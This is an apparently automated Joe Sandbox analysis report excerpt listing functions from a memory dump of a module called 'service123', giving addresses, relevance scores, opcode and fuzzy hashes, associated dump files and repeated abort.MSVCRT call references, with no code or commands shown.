Opcode Fuzzy Hash: d0ca08a1a2ac7f1435435c9c26c3781930e58dea940ca061f2db05310f69f963
Instruction Fuzzy Hash: 6E1115B2A006019FD704EF29D445706BBF0AB9A318F69C698D4188B312E37AD806CF96

Function 6CA4C040 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a07124339cd06127688824cc19b7e8acfd75fe9f2b67f8976422d9a072dbe3b5
Instruction ID: c676b57e00b51fb61ed40e3c62de1284f548eae545f7da1af1b6ac0ac6e698cf
Opcode Fuzzy Hash: a07124339cd06127688824cc19b7e8acfd75fe9f2b67f8976422d9a072dbe3b5
Instruction Fuzzy Hash: 8F014032A08640DF8704EE7DD88081AB7F1BB9A228F04DB59E85CD3705E631E805CF66

Function 6CA784A0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8221178cee0b62d4134746417e8d9e9ce7a202a656b1a6cf579cbc6b3236abdb
Instruction ID: fd12722c6caf649931371e894e5b250aae55994e8772c6065a37e762ce09f67e
Opcode Fuzzy Hash: 8221178cee0b62d4134746417e8d9e9ce7a202a656b1a6cf579cbc6b3236abdb
Instruction Fuzzy Hash: 49014F76A182818FC305DF3D848152BBBF06F6B204F49D95EE898D7315E235C816CB66

Function 6C9FD504 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38065637cddd05bc63f8f55e83b5f6858d4a716cd9787bd456eb58d9b090392b
Instruction ID: 795e88091925db0e44df518951765e051e8b308f8fc92831cb30eb453aadb961
Opcode Fuzzy Hash: 38065637cddd05bc63f8f55e83b5f6858d4a716cd9787bd456eb58d9b090392b
Instruction Fuzzy Hash: FA0171B2A052019BD704DF69D88476AFBE8FF85248F50C56DD858CB705D331D98ACBD2

Function 6CAA4360 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab8a79c2b48cfee40b024d56ccf29a716de7a3dc488174c9ca656d8e14e202c2
Instruction ID: e5438a673642a1245aa0c2bd7892469981405b268a0a923de2f3de372f6ff968
Opcode Fuzzy Hash: ab8a79c2b48cfee40b024d56ccf29a716de7a3dc488174c9ca656d8e14e202c2
Instruction Fuzzy Hash: 07F06D36A042419F8700EEBDD44152AB7F0AB56218F88DD58E818C3701E634D4568B77

Function 6CA2A1E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dfe9bd13181e70d68c283224aefbb5456b86068796d234d6b7a663a78dbcb0d
Instruction ID: 72f8eb64df1a05061a4aec8b11da280d8c52b961568f092da37204503978b2f2
Opcode Fuzzy Hash: 6dfe9bd13181e70d68c283224aefbb5456b86068796d234d6b7a663a78dbcb0d
Instruction Fuzzy Hash: DCD01271E001009F8B00EE28C640816B7B0AB96214B58D944D41897605E276E807CF55

Function 6C9FD974 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99528a8814be3e8ec686a86f925677d1370c2879c6c577cffe59eab6e90d6a45
Instruction ID: 3f7ce58f6c60075556041dc7a4cadf3238eb33daf37b3fcf68b88a19c4c2144a
Opcode Fuzzy Hash: 99528a8814be3e8ec686a86f925677d1370c2879c6c577cffe59eab6e90d6a45
Instruction Fuzzy Hash: CEC012729055004BCF00EF78C1C0078F6F1AF42248F565458C0D4E7700E771D886CB85

Function 6C9FD674 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d714ddeb1d54d60c99730855744db3a24bee261a28e7de1cd23f2af7a586b1f
Instruction ID: 7be4c7a3d7736d413d44cd80e19637d35059f3c775ed938513f93cd77e037061
Opcode Fuzzy Hash: 8d714ddeb1d54d60c99730855744db3a24bee261a28e7de1cd23f2af7a586b1f
Instruction Fuzzy Hash: 42C0C9728055004ACF40EF788080078F2E1AB52248F165858C094A7700E730D8468B45

Function 6C9FD7F4 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6687b09114d2675d96a31c0c6d2971c8d0cefab2a3ab88b4dde04cb7df0e6767
Instruction ID: 2767756faeaa5ca1dcfc533878bfd96717aae36129bd74cf75d4ff384b8a7761
Opcode Fuzzy Hash: 6687b09114d2675d96a31c0c6d2971c8d0cefab2a3ab88b4dde04cb7df0e6767
Instruction Fuzzy Hash: 16C01272C455044BCF00EF78C0C4578F3F0AB42244F165458C094E7700E730D886CB45

Function 6C9EB1D0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction ID: 782d119c42af2a3fc36733b64cbe3db86ae9f3a5c4333fa212206693cfed0480
Opcode Fuzzy Hash: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction Fuzzy Hash: 81C012B0C062409AC600BF388A0A239FAF07B42208F842CACE48013305E739C05C865B

Function 6C9DBAD0 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Strings

@, xrefs: 6C9DBAB1

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID: @
API String ID: 4206212132-2766056989
Opcode ID: 10603b8d348fc26e7feb5fc4e6bf5090863826b58efddf0145cfe0ed306ef85a
Instruction ID: 703e04ef0f63214d5156d5c1e506f73962861ab8b0d6e171a5a47e344a0d9081
Opcode Fuzzy Hash: 10603b8d348fc26e7feb5fc4e6bf5090863826b58efddf0145cfe0ed306ef85a
Instruction Fuzzy Hash: F1B16532609B1A8FC3108E6CC490355B7F6AB89318F4BC57ED895A7B95C339F949CB81

Function 6C9D2290 Relevance: 42.4, APIs: 28, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8afbe17598d2d4bff0a47749e5a9021e14fee9e7dd3f9276cefd338c2435501c
Instruction ID: 86de11bdd750951fd6648bde7d744a06cf5e912228bd80ea00b4325b9055e1db
Opcode Fuzzy Hash: 8afbe17598d2d4bff0a47749e5a9021e14fee9e7dd3f9276cefd338c2435501c
Instruction Fuzzy Hash: 16C1CC71604A018FD704CF29C48435AB7E2AF95318F56CA69D899EFB05E739F90ACB90

Function 6C9DB7A0 Relevance: 42.2, APIs: 28, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35efca67f197ca4ee0495dacd7f3f15a578fc9a00c4ad491c96531413cc161ee
Instruction ID: b3fac1ffc48361134727adcd6ec65a8e4cf9d47cf3906e5091c8436ab8073276
Opcode Fuzzy Hash: 35efca67f197ca4ee0495dacd7f3f15a578fc9a00c4ad491c96531413cc161ee
Instruction Fuzzy Hash: 8141C271909B869FD711CE29C0807167BF4AF4A328F1AC99DD995ABB42C331F885CB41

Function 6C9D28FA Relevance: 42.1, APIs: 28, Instructions: 84COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CAA6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 38779040d5ae9052793446b47de40f27c260e7e1190694c6f9840db0d7784ae8
Instruction ID: 9310b4ff0174072bde4ab2ba8e95c563402382e2a18eedbc8e49d35cf4823ac9
Opcode Fuzzy Hash: 38779040d5ae9052793446b47de40f27c260e7e1190694c6f9840db0d7784ae8
Instruction Fuzzy Hash: 281192B2642601CBE708EF5CE892B55B7B0FB22309F019A48D194D7B11D739E859CF90

Function 6C9D2A2F Relevance: 42.1, APIs: 28, Instructions: 82COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CAA6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 455798b013dd8c0e5b3d2bef30577e4e0f130be2609ec16fc1a1f6555a65bb91
Instruction ID: 851a661e0c4988fe28b65f1447344c7bb661afc2f1ee94adbba82e4b6a9702dd
Opcode Fuzzy Hash: 455798b013dd8c0e5b3d2bef30577e4e0f130be2609ec16fc1a1f6555a65bb91
Instruction Fuzzy Hash: A811A5B2642501CBE708EF5CE492B55B7B0FB22309F019A44D594D7B11D739E85CCF90

Function 6C9D29F0 Relevance: 42.1, APIs: 28, Instructions: 78COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CAA6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
